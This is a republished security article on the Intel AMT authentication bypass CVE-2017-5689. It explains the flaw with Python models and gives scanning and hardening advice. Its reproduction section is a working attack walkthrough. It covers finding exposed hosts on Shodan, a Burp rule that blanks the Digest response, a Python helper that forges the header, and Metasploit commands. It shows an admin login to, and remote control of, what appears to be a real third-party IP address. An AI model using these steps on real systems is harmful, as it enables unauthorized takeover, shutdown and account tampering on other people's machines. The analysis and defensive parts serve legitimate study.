Analysis and Practice of the Intel AMT Firmware Password Bypass Login Vulnerability

2025-02-24 Update From: SLTechnology News&Howtos (Servers)

Shulou (Shulou.com) 06/02 Report

By simeon, antian365.com

1.1 Brief introduction to the vulnerability

Intel published advisory INTEL-SA-00075 for the AMT vulnerability on May 1, 2017, without disclosing any details. On May 5, 2017, Tenable researcher Carlos Perez rediscovered the vulnerability and exploited it successfully after analyzing the LMS software package.

1. Vulnerability number

The Intel firmware password bypass login vulnerability has the CVE number CVE-2017-5689. It affects Intel AMT firmware on systems provisioned with the Intel manageability SKUs Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). In other words, once the hardware has been provisioned for management (the LMS software package exposes the same interface locally, and the firmware serves a web interface on the network), an unprivileged network attacker can obtain management privileges over the system: add administrator accounts, change network settings, restart the computer remotely, and so on.

AMT is an out-of-band management feature reachable through the device's wired Ethernet interface on TCP port 16992 (HTTP; 16993 when TLS is enabled). It exposes full control of the system to the network so that IT staff and other administrators can remotely restart, repair and reconfigure servers and workstations; it provides a virtual serial console and (if the right driver is installed) remote desktop access. A password should be required before any of this is granted, but the vulnerability described above means that unauthenticated users can reach the hardware control panel. Even where firewall rules restrict AMT access, anyone, or any malware, already on the user's network can exploit it to gain access to AMT-managed workstations and servers and move further into the enterprise.

2. Affected systems

Affected firmware versions are 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5 and 11.6. Intel's advisory lists the following builds as the first fixed firmware version for each Core generation; earlier builds in the same branch are affected:

First generation Core family: 6.2.61.3535

Second generation Core family: 7.1.91.3272

The third generation Core family: 8.1.71.3608

Fourth generation Core family: 9.1.41.3024 and 9.5.61.3012

The fifth generation Core family: 10.0.55.3000

Sixth generation Core family: 11.0.25.3001

Seventh generation Core family: 11.6.27.3264

3. Attack scenarios

(1) Power the server off directly.

(2) Restart the system and boot a system of the attacker's choice by loading an img image file.

(3) Modify BIOS settings directly.

(4) Take over the machine through KVM.

4. Principle of the vulnerability

AMT login is decided by a comparison whose length, response_length, comes from the client. The key code is:

if (strncmp(computed_response, user_response, response_length))

    deny_access();

strncmp() compares at most response_length bytes of the two strings. The two strings are the authentication response sent by the login attempt (user_response, the response field of the HTTP Digest Authorization header) and the response the firmware computed for its own challenge (computed_response). If they match, the password is presumably correct, so the function returns zero and the code goes on to grant access; if they differ, it returns a non-zero value, the password is wrong and access is denied. The flaw is that response_length is the length of the response the client supplied, not the length of the expected digest. If an empty string is supplied, the length is zero, no bytes are compared and therefore none differ; strncmp() returns zero, exactly as it would for a correct response. An empty response is thus accepted as valid even though it is not, so the login can be bypassed by replacing the value of the response field with an empty string. (Any prefix of the correct digest passes the same check, but the empty string is the one that needs no guessing.)
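To make the comparison concrete, here is an added Python model of the check; it is example code written for this article, not the firmware's code and not part of the original write-up. digest_response implements the RFC 2617 MD5 formula that HTTP Digest authentication (and therefore the AMT web interface) uses, vulnerable_check models the strncmp() call with the client-controlled length, and fixed_check is the correct comparison. The realm, nonce, user name and password are constructed values.

```python
import hashlib
import hmac

# Constructed stand-ins for one AMT Digest challenge. The real realm and nonce
# come from the firmware's WWW-Authenticate header; the password is needed only
# to compute what the firmware expects, the attacker never supplies it.
REALM = "Digest:0123456789ABCDEF0123456789ABCDEF"
NONCE = "5d41402abc4b2a76"
URI = "/index.htm"
USERNAME = "admin"
PASSWORD = "P@ssw0rd!"


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 HTTP Digest 'response' value (MD5), with or without qop=auth."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop:
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def vulnerable_check(computed_response: str, user_response: str) -> bool:
    """Models strncmp(computed_response, user_response, response_length) where
    response_length is the length of the client-supplied response. Only that
    many bytes are compared, so "" and any prefix of the expected digest
    compare equal and access is granted (True)."""
    n = len(user_response)
    return computed_response[:n] == user_response


def fixed_check(computed_response: str, user_response: str) -> bool:
    """Correct check: the lengths must match and every byte of the expected
    digest is compared, in constant time."""
    if len(user_response) != len(computed_response):
        return False
    return hmac.compare_digest(computed_response.encode(), user_response.encode())


def demo() -> dict:
    """Run both checks against the digest the firmware expects for GET /index.htm.
    Returns {attempt name: (vulnerable result, fixed result)}."""
    expected = digest_response(USERNAME, REALM, PASSWORD, "GET", URI, NONCE)
    attempts = {
        "empty": "",                  # what the Burp rule in section 1.2 sends
        "prefix": expected[:6],       # first 6 hex digits of the real digest
        "wrong": "z" * len(expected),
        "correct": expected,
    }
    return {name: (vulnerable_check(expected, r), fixed_check(expected, r))
            for name, r in attempts.items()}


if __name__ == "__main__":
    for name, (vuln, fixed) in demo().items():
        v = "GRANTED" if vuln else "denied"
        f = "GRANTED" if fixed else "denied"
        print(f"{name:8s} vulnerable={v:8s} fixed={f}")
```

Running it shows the vulnerable check granting access for the empty response and for a six-character prefix of the real digest, while the fixed check grants access only for the complete, correct digest.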

1.2 Reproducing the exploitation

1. Search for the ports

The vulnerable service listens on ports 16992, 16993 and 623, so candidate hosts can be found with search engines such as ZoomEye and Shodan by searching for "port:16992", "port:16993" and "port:623". To narrow the results, add the keyword Intel Active Management Technology, as in figure 1, for example by searching directly for: Intel Active Management Technology country:China port:16992

Figure 1 Searching for servers with AMT ports

2. Check that the web server is running

Look at the results shown with the two-square icon in the search listing; for example, open the record for "118.150.17.193" at http://118.150.17.193:16992/logon.htm. As figure 2 shows, the site is working normally.

Figure 2 Checking that the AMT service is running

3. Modify the Burp Suite settings

After starting Burp Suite, open "Proxy" > "Options" and under "Match and Replace" create (or edit) a rule of type Request header with the match value response="[0-9a-f]+" and the replace value response="" , as shown in figure 3. Then set the intercept switch under Intercept to "Intercept is on".

Figure 3 Modifying the Burp Suite settings

4. Log in as admin

Return to the browser (make sure the browser proxy, e.g. in IE, is set to 127.0.0.1 port 8080), click "Log On", enter the user name admin and any password at all.

Figure 4 Logging in as admin

5. Successful login to the AMT management interface

In Burp's Intercept tab click "Forward" to release the request. As figure 5 shows, the AMT management interface opens: it displays the power state (here hibernating), IP address, wireless IP address, system ID and other information, and lets you view details of the system, processor, memory, disks and power supply.

Figure 5 Logged in to the AMT management interface
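The rewrite that the Burp rule in step 3 performs, together with the matching detection check a defender would run on proxy or WAF logs, as an added Python example that is not part of the original article. The captured Authorization header is constructed; the realm and nonce only imitate the AMT format.

```python
import re

# Constructed Authorization header of the kind the browser sends for the AMT
# logon page after you type admin and any password; all values are made up.
CAPTURED_AUTH = (
    'Digest username="admin", realm="Digest:0123456789ABCDEF0123456789ABCDEF", '
    'nonce="5d41402abc4b2a76", uri="/index.htm", '
    'response="3f2c0d1e9a8b7c6d5e4f3a2b1c0d9e8f", qop=auth, nc=00000001, '
    'cnonce="7e57c0de"'
)

# The same pattern as the Burp Suite "Match and Replace" rule in step 3.
RESPONSE_RE = re.compile(r'response="[0-9a-f]+"')
# key="quoted value" or key=bare-token, the two forms Digest headers use
PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')
MD5_HEX_RE = re.compile(r"[0-9a-fA-F]{32}")


def forge_empty_response(auth_header: str) -> str:
    """Attacker side: blank the Digest response field, leaving every other
    field (username, realm, nonce, uri, ...) untouched."""
    return RESPONSE_RE.sub('response=""', auth_header, count=1)


def parse_digest(auth_header: str) -> dict:
    """Split a 'Digest ...' Authorization value into its fields."""
    if not auth_header.startswith("Digest "):
        raise ValueError("not a Digest Authorization header")
    fields = {}
    for key, quoted, bare in PARAM_RE.findall(auth_header[len("Digest "):]):
        fields[key] = bare if bare else quoted
    return fields


def is_bypass_attempt(auth_header: str) -> bool:
    """Defender side: a legitimate client always sends a 32-hex-digit MD5
    response; an empty or truncated one is a CVE-2017-5689 style attempt."""
    try:
        fields = parse_digest(auth_header)
    except ValueError:
        return False
    return MD5_HEX_RE.fullmatch(fields.get("response", "")) is None


def flag_headers(headers) -> list:
    """Return the headers (e.g. from proxy or WAF logs) that look like bypass attempts."""
    return [h for h in headers if is_bypass_attempt(h)]


if __name__ == "__main__":
    forged = forge_empty_response(CAPTURED_AUTH)
    print("forged :", forged)
    print("flagged:", flag_headers([CAPTURED_AUTH, forged]))
```

The detection rule is deliberately narrow: it fires on a response field that is not a full 32-digit MD5 hex string, which no standards-conforming client ever sends, so it is cheap to deploy on the network in front of AMT-capable hosts while they are still unpatched.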

6. Remotely restart the system

Click "Remote Control", shown in figure 6. From here you can perform a normal boot, boot from CD, boot from hard disk, or even power the machine off directly. For an important system the consequences of an unexpected power-off are obvious.

Figure 6 Remote control of the system

7. User account management

Click User Accounts. Here you can create new users, change user passwords, delete users and change the administrator, as shown in figure 7, and set each user's permission level. When adding a user the password must be at least 8 characters long and contain upper- and lower-case letters, digits and special characters, as shown in figure 8; otherwise the user cannot be added.

Figure 7 User management

Figure 8 Changing a password

8. Full TCP port scan of the target IP with Nmap

A full TCP port scan of the target IP with Nmap shows ports 16992, 16994 and 623 open, as in figure 9, which differs from the 16992, 16993 and 623 listed by Tenable. This is expected: 16992 is the AMT web interface over HTTP and 16993 is the same interface over TLS, which is only open when TLS has been provisioned; 16994 (and 16995 for TLS) carries the redirection services (serial-over-LAN and IDE redirection), and 623 carries WS-Management. Which ports a given host exposes depends on how it was provisioned, so scan for all of them.

1.3 Using msf on the Kali platform

Start msfconsole and test with the following module. RHOSTS takes the target IP or range; RPORT defaults to 16992.

msf > use auxiliary/scanner/http/intel_amt_digest_bypass

msf auxiliary(intel_amt_digest_bypass) > show options

msf auxiliary(intel_amt_digest_bypass) > set RHOSTS <target IP or range>

msf auxiliary(intel_amt_digest_bypass) > run

1.4 Security precautions

1. Scanning

Tenable has added a detection plugin to Nessus; users of that scanner should update their plugin set. For other scanners, add TCP ports 16992, 16993, 16994 and 623 to the scan; any host with these open can be checked by hand by browsing to the logon page. Intel has also published a detection guide and tool for INTEL-SA-00075.

2. Hardening

Block TCP ports 16992, 16993, 16994, 16995, 623 and 664 on network firewalls and switch ACLs between untrusted segments and AMT-capable hosts. Note that a host-based firewall does not help: the Management Engine intercepts these ports on the wired NIC before the operating system ever sees the packets. Where AMT is not needed, unprovision it (Intel's mitigation guide for INTEL-SA-00075 describes how) and disable or remove the LMS service. Then apply the fixed firmware, which is distributed by the system's OEM rather than directly by Intel, as soon as it is available.

1.5 Reference articles

(1) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689

(2) https://threatpost.com/researcher-baseless-assumptions-exist-about-intel-amt-vulnerability/125390/

(3) https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability

(4) https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf

(5) https://www.rapid7.com/db/modules/auxiliary/scanner/http/intel_amt_digest_bypass
